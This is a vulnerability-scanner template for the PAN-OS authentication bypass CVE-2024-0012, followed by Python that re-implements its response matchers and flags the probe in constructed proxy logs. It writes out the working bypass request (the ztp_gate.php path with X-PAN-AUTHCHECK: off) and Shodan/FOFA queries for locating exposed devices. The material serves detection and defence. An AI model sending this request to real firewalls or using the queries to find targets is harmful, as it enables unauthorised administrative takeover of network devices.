An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities.
PoC code [publicly available]
id: CVE-2024-0012

info:
  name: PAN-OS Management Web Interface - Authentication Bypass
  author: johnk3r,watchtowr
  severity: critical
  description: |
    An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities
  impact: |
    Unauthenticated attackers with network access to the management interface can bypass authentication to gain full administrator privileges, allowing them to tamper with configurations, exploit additional vulnerabilities, and completely compromise the Palo Alto firewall and connected networks.
  remediation: |
    Upgrade to the latest patched version of PAN-OS as specified in the vendor security advisory.
  reference:
    - https://security.paloaltonetworks.com/CVE-2024-0012
    - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-0012
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0012
    cwe-id: CWE-306
    epss-score: 0.943
    epss-percentile: 0.9994
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    fofa-query: icon_hash="-631559155"
    shodan-query:
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
      - http.favicon.hash:"-631559155"
  tags: cve,cve2024,paloalto,globalprotect,kev,vkev,vuln

http:
  - raw:
      - |
        GET /php/ztp_gate.php/.js.map HTTP/1.1
        Host: {{Hostname}}
        X-PAN-AUTHCHECK: off

    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")'
          - 'contains(body, "/scripts/cache/mainui.javascript")'
          - 'contains(header, "PHPSESSID=")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022005cfdb2f6a311e49ab6d4c9c76872b6237622c407a8ea93d9a7d4484faaaafbf022100aaf6e59de6a364dd128ea46d47d42d488fc7c53abb00386dc5e0880fbef207c4:922c64590222798bb761d5b6d8e72950
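The template's four `dsl` expressions under `condition: and` decide whether a response looks like an unauthenticated request reached the ZTP page. The following Python is an added example, not part of the template and not Palo Alto Networks or ProjectDiscovery code: it re-implements that matcher logic over a constructed response so a defender can see exactly which response features the signature keys on, and it adds a small check over constructed proxy/WAF records that flags the request shape the template sends (the `ztp_gate.php` sub-path and the `X-PAN-AUTHCHECK: off` header). All function names, sample responses and records are assumptions made for illustration; a log format that retains request headers is also assumed.

```python
"""
Added example: re-implements the Nuclei template's matcher logic and a
defender-side record check. Names, sample responses and records are
constructed for illustration; nothing here sends a request.
"""
from dataclasses import dataclass, field

TEMPLATE_PATH = "/php/ztp_gate.php/.js.map"   # request path from the template
BYPASS_HEADER = "X-PAN-AUTHCHECK"             # header name from the template


@dataclass
class HttpResponse:
    status_code: int
    headers: dict = field(default_factory=dict)  # constructed header map
    body: str = ""


def header_blob(headers: dict) -> str:
    """Nuclei's `header` variable is the raw header block; flatten the map to mimic it."""
    return "\r\n".join(f"{k}: {v}" for k, v in headers.items())


def matches_cve_2024_0012(resp: HttpResponse) -> bool:
    """Evaluate the template's DSL expressions; `condition: and` requires all four."""
    header = header_blob(resp.headers)
    checks = [
        # contains_any(body, "<title>Zero Touch Provisioning", "Zero Touch Provisioning (ZTP)")
        any(s in resp.body for s in ("<title>Zero Touch Provisioning",
                                     "Zero Touch Provisioning (ZTP)")),
        # contains(body, "/scripts/cache/mainui.javascript")
        "/scripts/cache/mainui.javascript" in resp.body,
        # contains(header, "PHPSESSID=")
        "PHPSESSID=" in header,
        # status_code == 200
        resp.status_code == 200,
    ]
    return all(checks)


def flag_suspicious_request(record: dict) -> list:
    """
    Return the reasons a constructed proxy/WAF record looks like a probe for this
    issue: the exact template path, any sub-path appended to ztp_gate.php, or the
    auth-check header set to off. An empty list means nothing matched.
    """
    reasons = []
    path = record.get("path", "")
    headers = {k.lower(): v for k, v in record.get("headers", {}).items()}
    if path == TEMPLATE_PATH:
        reasons.append("exact template probe path")
    elif path.startswith("/php/ztp_gate.php/"):
        reasons.append("path suffix appended to ztp_gate.php")
    if headers.get(BYPASS_HEADER.lower(), "").strip().lower() == "off":
        reasons.append(f"{BYPASS_HEADER} header set to off")
    return reasons


# Constructed sample responses: one shaped like an unpatched management
# interface answering the unauthenticated request, one shaped like a device
# that redirects to the login page instead.
VULNERABLE_LIKE = HttpResponse(
    status_code=200,
    headers={"Set-Cookie": "PHPSESSID=constructedsessionid; path=/"},
    body='<html><head><title>Zero Touch Provisioning</title>'
         '<script src="/scripts/cache/mainui.javascript"></script></head></html>',
)
PATCHED_LIKE = HttpResponse(
    status_code=302, headers={"Location": "/php/login.php"}, body=""
)

# Constructed proxy/WAF records (documentation-range source addresses).
SAMPLE_RECORDS = [
    {"src": "198.51.100.7", "path": TEMPLATE_PATH,
     "headers": {"Host": "fw-mgmt.example", BYPASS_HEADER: "off"}},
    {"src": "203.0.113.9", "path": "/php/ztp_gate.php/anything",
     "headers": {"Host": "fw-mgmt.example"}},
    {"src": "192.0.2.4", "path": "/php/login.php",
     "headers": {"Host": "fw-mgmt.example"}},
]


def scan_records(records: list) -> dict:
    """Map source address -> reasons, for every record that triggered at least one."""
    return {r["src"]: flag_suspicious_request(r)
            for r in records if flag_suspicious_request(r)}


if __name__ == "__main__":
    print("template matches vulnerable-like response:", matches_cve_2024_0012(VULNERABLE_LIKE))
    print("template matches patched-like response:", matches_cve_2024_0012(PATCHED_LIKE))
    for src, why in scan_records(SAMPLE_RECORDS).items():
        print(src, "->", "; ".join(why))
```

The matcher side shows why a device that redirects to `/php/login.php` is not reported: the `and` condition fails on the status code alone, so a single mismatched check is enough to clear a host. The record side is deliberately broader than the template's exact path, since any sub-path appended to `ztp_gate.php` or any request carrying `X-PAN-AUTHCHECK: off` at the management interface is worth a look regardless of the file extension used.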